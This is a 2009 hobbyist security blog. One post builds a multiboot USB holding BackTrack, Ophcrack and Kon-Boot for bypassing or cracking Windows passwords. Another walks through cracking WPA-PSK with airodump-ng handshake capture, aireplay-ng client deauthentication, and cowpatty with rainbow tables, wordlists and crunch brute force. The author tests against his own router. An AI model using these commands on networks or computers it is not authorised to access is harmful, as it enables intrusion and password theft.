http://www.mediafire.com/file/4xa4m4sbdqv990x/ssidstrip

Or if you like a bit more to look at (and with some more safety built in to avoid accidental overwriting etc.)
SSIDstrip_v0.2

ssidstrip_v0.2 can be downloaded here ;
http://www.mediafire.com/file/uojgs7jc6dmmfxa/ssidstrip_v0.2

Links to information on above;

Official GISKismet Development Home

Official Kismet Homepage

Multiboot USB, Finally !!

2009-08-03T08:09:00.017+02:00

So a while ago there was an episode on Hak5 which showed how to make a USB bootable with a number of different distros.
Its perfect and something I have been wanting to do with Ophcrack and BackTrack for a while.

So what needed to start off ;
> USB drive, any size, but would recommend 8 - 16 gig, why not, it is cheap enough these days.
> Your live distro's of choice
> Additional software to prepare the USB

PREPARING YOUR USB DISK
=======================

The process is fairly straightforward and only a few bits of software (free) are needed ;

1. PeToUSB v3.0.0.8
http://gocoding.com/page.php?al=petousb
http://eaz.nm.ru/download/PeToUSB_3.0.0.8.exe

This software will format the USB drive and make it bootable.

2. grubinst v1.0.1
http://sourceforge.net/projects/grub4dos/files/grubinst/grubinst%201.0.1/grubinst_1.0.1_bin_win.zip/download

This will install the MBR on the USB flash drive.

3. grub4dos v0.4.4
http://sourceforge.net/projects/grub4dos/files/GRUB4DOS/grub4dos%200.4.4/grub4dos-0.4.4.zip/download

You actually only want this for a file which is included; gldr

So proceed as follows;

1.
==
Plug in your USB key and start up PeToUSB.
It will check your disks on starting up and will list them, choose the one you want to make bootable and under format options, check ;
Enable Disk Format
Quick Format
Force Volume Dismount
(! This will format your USB drive, make sure you are choosing the right one and didnt have anything left on it !)

Click Start and then Yes to start the formatting then close down the program when complete.

Now it is possible that the drive is not formatted as FAT32, so do the following to ensure it is;

Right-click My Computer --> Manage --> Disk Management

Choose your USB drive, make sure you are choosing the correct one !
Right click it and choose format and then choose FAT32.

Leave this window open as you will need it in next step.

1st step complete !

Next is to start up grubinst.
2.
==
Extract the contents of the gruninst zip file to a folder (I created the folder C:\Program Files\GrubInst).
Open the grubinstGUI

!VERY IMPORTANT!
Check, double check and then re-check again what drive your USB disk is in disk management.
In this example, you can see in disk management that it is drive 3.
In grubinst_GUI choose the correct drive from the dropdown list, leave all else unchecked and
click on install.

When the popup comes that MBR has been successfully installed, all is good and grubinst can be closed.

Thats it for step 2!

3.
Extract the grub4dos to a folder and copy the file grldr to the root of your USB disk.

Your USB drive is now prepped and ready to continue !

All the above just done on a 1G stick (all I had empty and handy at the time..)
but of course much better to do it on a much larger one so that you can fit more
distros on it !

Distros
=======

So now the USB drive is prepared, time to put the distro's on.

For example I only have 3 on my 16G usb drive ;

BackTrack 4 Pre Final
http://www.remote-exploit.org/backtrack_download.html
OphCrack (live cd)
http://ophcrack.sourceforge.net/
KonBoot
http://www.piotrbania.com/all/kon-boot/
(I downloaded the floppy drive image)

For Backtrack and Ophcrack you need to extract the iso to the USB and then rename the boot folder for each one.
So after extracting the backtrack.iso to the USB drive, there will be two folders; casper & boot.

Rename the boot folder to for instance "bootBT4"

Then extract the Opcrack live cd and rename the opcrack boot folder to for instance "bootOPH"

For KonBoot, you can copy the image directly to the root of the USB drive.

Boot menu
========

So now all the distros are on the USB we need to make the boot menu point to the right areas.

1.
Right-click in the root of the USB drive and create new txt file, save this as menu.lst

The exact text required will change depending on how you named your boot folders and konboot image, but mine is very simple and looks like this ;

color blue/black lime/blue
timeout 120

#BT4 Pre Final, Pentesting utilities
#Without persistant changes
#------------------------------------
title BackTrack4 Pre Final
kernel /bootBT4PF/vmlinuz BOOT=casper boot=casper nopersistent rw quiet vga=0x317
initrd=/bootBT4PF/initrd.gz
rootnoverify

#KON-BOOT, bypassing windows passwords
#-------------------------------------
title Kon-Boot FD
map --mem /FD0-konboot-v1.1-2in1.img (fd0)
map --hook
chainloader (fd0)+1
map (hd1) (hd0)
map --hook
rootnoverify (fd0)

#OPHcrack, windows password cracking
#with rainbow tables, XP Special
#------------------------------------
title Ophcrack
kernel /bootOPH/bzImage rw root=/dev/null vga=normal lang=C kmap=us screen=1024x768x16 autologin
initrd /bootOPH/rootfs.gz

#Reboot the system
#-----------------
title Reboot
reboot

My directories look like this;

So now you have a fully functioning multi boot USB drive !

The forums at hak5 have some interesting and helpful info on how to do the above and also nice examples of menu.lst
http://hak5.org/forums/index.php?showtopic=13842

Enjoy !

Back on Track to Backtrack - WPA cracking

2009-07-28T21:31:00.022+02:00

So, after having lived a couple of weeks without my eeepc, I could take it no longer and got myself a new toy.
A Samsung N110, pretty sweet, and actually did go for Windows XP OS, whatever you say about Windows, it is usually handy to have and when needing Linux, I'll just bootup the live USB.

Only small gripe I have is that the bios does now allow booting from SD card which is kinda annoying, but I have a tiny USB 8gig drive, so its OK. Its just that the eeePC seemed to be more versatile out of the box.. oh well, no worries, it works !

When BT4 is finalised I'll probably do a dual boot HDD install, but waiting with that for the moment :)

So anyway, back on track to backtrack ..

In previous posts I looked at wireless and WEP encrypted networks and how especially
the wep networks are dangerously weak.
This all done with BackTrack3 Final.

Important to note the below using BackTrack 4 Pre Final.

Now time to look at WPA and WPA2 protected networks which are normally the ones that
you will see the most.

I have setup a test network using my Asus router as follows ;

essid : default
Encryption : WPA-PSK
No MAC filtering
DHCP enabled

So the point of this is to demonstrate the problems with people using weak passwords for their WPA encrypted connections.

For this example we will use Cowpatty, which is a program made to crack WPA(2) passwords using either rainbow tables or simple wordlists.
Granted this does not catch all, but it can catch the uncautious.

The advantage of using rainbow tables is that it is much faster (when you actually have the tables that is..) just using a wordlist means the program has to combine the essid, with the passphrase, create a hash out of these two and see of it is OK.
Rainbow tables already have these hashes pre-computed, so saving time.

Some rainbow tables have already been made using of the some of the most commonly seen essids, using a 49 million word dictionary for use with Cowpatty; http://www.offensive-security.com/wpa-tables/

So what we need to do is the following
> Identify our target network
> Verify if any clients are associated to network
> If no clients associated.. wait..
> If clients associated, deauth and capture 4-way handshake
> Use this 4-way handshake to with cowpatty to crack network WPA password.

Identifying target

Start our interface in monitor mode and start up airodump, since I know my network will be a WPA network on channel 1, I start airodump with filters for those ;

airmon-ng
airmon-ng start wlan0
airodump-ng mon0 -c 1 -t WPA

And then see the target we are looking to attack

So after having identified the network I am after I will re-start airodump identifying the bssid and start monitoring and writing data (in this case using 'default' as filename to write to)and wait for a client to connect.

airodump-ng mon0 -c 1 -t WPA --bssid 00:13:D4:09:32:60 -w default

When the 4-way handshake is captured after the client associates (see top right of the picture below) I no longer need airodump and can continue.

If there is already a client connected to the AP, we need to deauth the client and force it to reconnect, thus giving the 4-way handshake we need.
In a seperate console;
aireplay-ng mon0 -0 5 -a 00:13:D4:09:32:60 -c 00:1F:3C:8C:D9:71

Now we need to have the WPA rainbow table handy for this crack, so use the link above for rainbow tables or make your own..

Start up cowpatty and enter information as necessary.
(All below my specific info, change to suit your needs)

In this case (in cowpatty console);

./cowpatty -d /media/disk/WPA_tables/default.wpa -r ~/default-01.cap -s default

When starting;

When done;

So as you can see from the above pic, the passphrase is butterfly and the program managed to go through over 45000 passwords per second.. pretty good !

Doing the exact same crack, but then just using the dictionary file from which the rainbow tables were made, the situation only changes when starting up cowpatty.
You still need the handshake with the AP and the essid, then proceed as follows;(in my case my wordlist is on the drive-folder /media/disk/WORDLISTS/)

./cowpatty -f /media/disk/WORDLISTS/wpalist.txt -r ~/default-01.cap -s default

I didn't have the patience to let it run its course.. it was only doing 34 passphrases a second and that would have taken a looong time ! However given time and patience.. a lot can be done.
Remember this done on a Samsung N110 with 2gig ram, if the cracking were to be done on a different/better setup, speed would be better.

It is also possible to bruteforce the passphrase using crunch and piping the output through cowpatty.

For instance, there is a telecom provider here that issued a WPA key along with it's router that
was always a combination of numbers and upper case characters up to F of 8 characters in length.

In that case, if we were to feel patient.. we could run crunch using the known variables and pipe the outcome to cowpatty as follows ;

/pentest/passwords/crunch/./crunch 8 8 0123456789ABCDEF | /pentest/wireless/cowpatty/./cowpatty -f - -r ~/capfile.cap -s essid

I can do something similar in my case using buterfly as character set (since I know those are all the characters in the passphrase) and to speed things up fixing the first 5 characters;

/pentest/passwords/crunch/./crunch 9 9 buterfly -t butte@@@@ | /pentest/wireless/cowpatty/./cowpatty -f - -r ~/default-01.cap -s default -v

Disaster strikes !

2009-07-06T11:21:00.005+02:00

Argh !

My lovely Asus eeepc took a dive to the floor and has fractured the screen :(

I am blaming my wife, she is blaming my uncontrolled movements after having
a few beers too many.. which of course is ludicrous seeing as how I still move
with the grace of a ballet dancer no matter the quantity of alcohol containing
beverages I consume..
So I have one-sidedly decided to put the blame close to the middle.. closer to her..
(pics will be posted when I find the charger.. incidently I blame the wife for losing that as well)

EDIT
----
OK, found the charger.. it might not have been the better half's fault after all..
Still undecided on the damage sustained to my eeepc though !

In any case the netbook is toast now and am unable to practice the joys of BackTrack
which is a nuisance as the new BT4PreFinal is out and looks pretty sweet.. and I want to get to grips with all the goodness on it !

So to bide the time, a short summary of the excitement on holiday.. yeah.. its kinda quiet there, but great for a rest.

Arrived and found there was a large bee's nest between the windows and the shutters.. yikes..
Got the bee man round and he smoked them with a mixture of straw and cattle feed (?!) which
seems to calm them down a bit, then cut off the combs and put the ones with bee larvae in them
in a new slot for his box..

I was hoping to see the queen, but never did, and even the bee man didn't see her either, all in all
though pretty damn sweet to see.

The beehive;

The dude getting ready;

Starting the removal of the combs one by one ;

Scraping off the bees into his make-shift hive ;

Actually got about a quarter of a jar of honey as well, can't complain I suppose !